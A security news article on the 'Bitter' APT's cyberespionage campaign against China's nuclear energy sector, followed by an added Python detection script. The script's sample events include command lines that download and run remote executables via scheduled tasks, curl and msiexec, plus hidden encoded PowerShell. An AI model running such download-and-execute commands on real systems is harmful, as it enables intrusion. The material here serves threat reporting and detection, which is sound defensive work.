1 April 2023

China’s Nuclear Energy Sector Targeted in Cyberespionage Campaign

Ionut Arghire

A South Asian advanced persistent threat (APT) actor has been targeting the nuclear energy sector in China in a recent cyberespionage campaign, Intezer reports.

Dubbed ‘Bitter’ and active since at least 2021, the group is known for targeting energy and government organizations in Bangladesh, China, Pakistan, and Saudi Arabia, and is characterized by its use of Excel exploits, Microsoft Compiled HTML Help (CHM) files, and Windows Installer (MSI) files.

Continuing to target Chinese organizations, the group used updated first-stage payloads in the recently observed espionage campaign, added an extra layer of obfuscation, and employed additional decoys for social engineering.

The Bitter APT targeted recipients in China’s nuclear energy industry with at least seven phishing emails impersonating the embassy of Kyrgyzstan in China, inviting them to join conferences on relevant subjects.

The recipients were lured into downloading and opening an attached RAR archive containing CHM or Excel payloads designed to achieve persistence and fetch additional malware from the command-and-control (C&C) server.

Observed Excel payloads contained an Equation Editor exploit designed to create one scheduled task that downloads a next-stage EXE file and another that executes it.

CHM files, on the other hand, can be used to execute arbitrary code with little user interaction, even when no vulnerable version of Microsoft Office is installed, and the Bitter APT used multiple such files in this campaign.

One of the identified variants creates a scheduled task to execute a remote MSI payload using msiexec. While investigating the attack chain, Intezer was only served empty MSI files, which the attackers could use for reconnaissance and swap for an actual payload if a target is deemed promising.

A second version of the CHM file was observed performing similar activity using an encoded PowerShell command stage.
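As an added illustration (not from the article or from Intezer's report), the Python triage script below applies the behaviours described above to constructed process-creation records: Equation Editor or the CHM viewer (hh.exe) spawning a child process, a scheduled task whose action fetches a URL, msiexec installing a package straight from a URL, and encoded PowerShell. The event fields, process names and placeholder URL are assumptions.

```python
import re

# Constructed sample process-creation records (not taken from the article or Intezer's report).
# Each record: parent image, child image, full command line.
SAMPLE_EVENTS = [
    {"parent": "excel.exe", "image": "eqnedt32.exe", "cmdline": "eqnedt32.exe -Embedding"},
    {"parent": "eqnedt32.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /create /sc minute /mo 10 /tn Update "
                "/tr \"curl http://placeholder.invalid/x.exe -o C:\\Users\\Public\\x.exe\""},
    {"parent": "hh.exe", "image": "schtasks.exe",
     "cmdline": "schtasks /create /tn Install /sc once /st 12:00 "
                "/tr \"msiexec /i http://placeholder.invalid/a.msi /qn\""},
    {"parent": "hh.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -EncodedCommand SQBFAFgAIAAoAE4A..."},
    {"parent": "explorer.exe", "image": "msiexec.exe", "cmdline": "msiexec /i C:\\Temp\\setup.msi /qn"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
ENC_PS_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s", re.IGNORECASE)
TASK_CREATE_RE = re.compile(r"schtasks(?:\.exe)?\s.*?/create", re.IGNORECASE)
MSIEXEC_RE = re.compile(r"msiexec(?:\.exe)?\s", re.IGNORECASE)
# Script hosts and system tools a help-file viewer has no business launching.
CHM_CHILDREN = {"cmd.exe", "powershell.exe", "schtasks.exe", "msiexec.exe", "mshta.exe", "wscript.exe"}


def classify(event):
    """Return the names of the detection rules the event matches (empty list if none)."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    hits = []
    if parent == "eqnedt32.exe":
        hits.append("equation_editor_spawned_child")   # Equation Editor should not launch other tools
    if parent == "hh.exe" and image in CHM_CHILDREN:
        hits.append("chm_viewer_spawned_child")        # CHM viewer launching a script host or tool
    if TASK_CREATE_RE.search(cmd) and URL_RE.search(cmd):
        hits.append("scheduled_task_fetches_remote")   # task action reaches out to a URL
    if MSIEXEC_RE.search(cmd) and URL_RE.search(cmd):
        hits.append("msiexec_remote_package")          # MSI installed directly from a URL
    if image == "powershell.exe" and ENC_PS_RE.search(cmd):
        hits.append("encoded_powershell")              # base64-encoded command stage
    return hits


def triage(events):
    """Map the index of each suspicious event to its matched rules; clean events are omitted."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], rules)
```

Real deployments would read these fields from Sysmon Event ID 1 or Windows Security Event ID 4688 records and also watch task-creation events (Event ID 4698) for the same URL patterns.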

“Bitter APT do not appear to change their tactics too much, therefore we can assume that the payloads will be similar to those observed in 2021, executing a downloader module that can be served with plugins such as a keylogger, remote access tool, file stealer, or browser credential stealer,” Intezer notes.
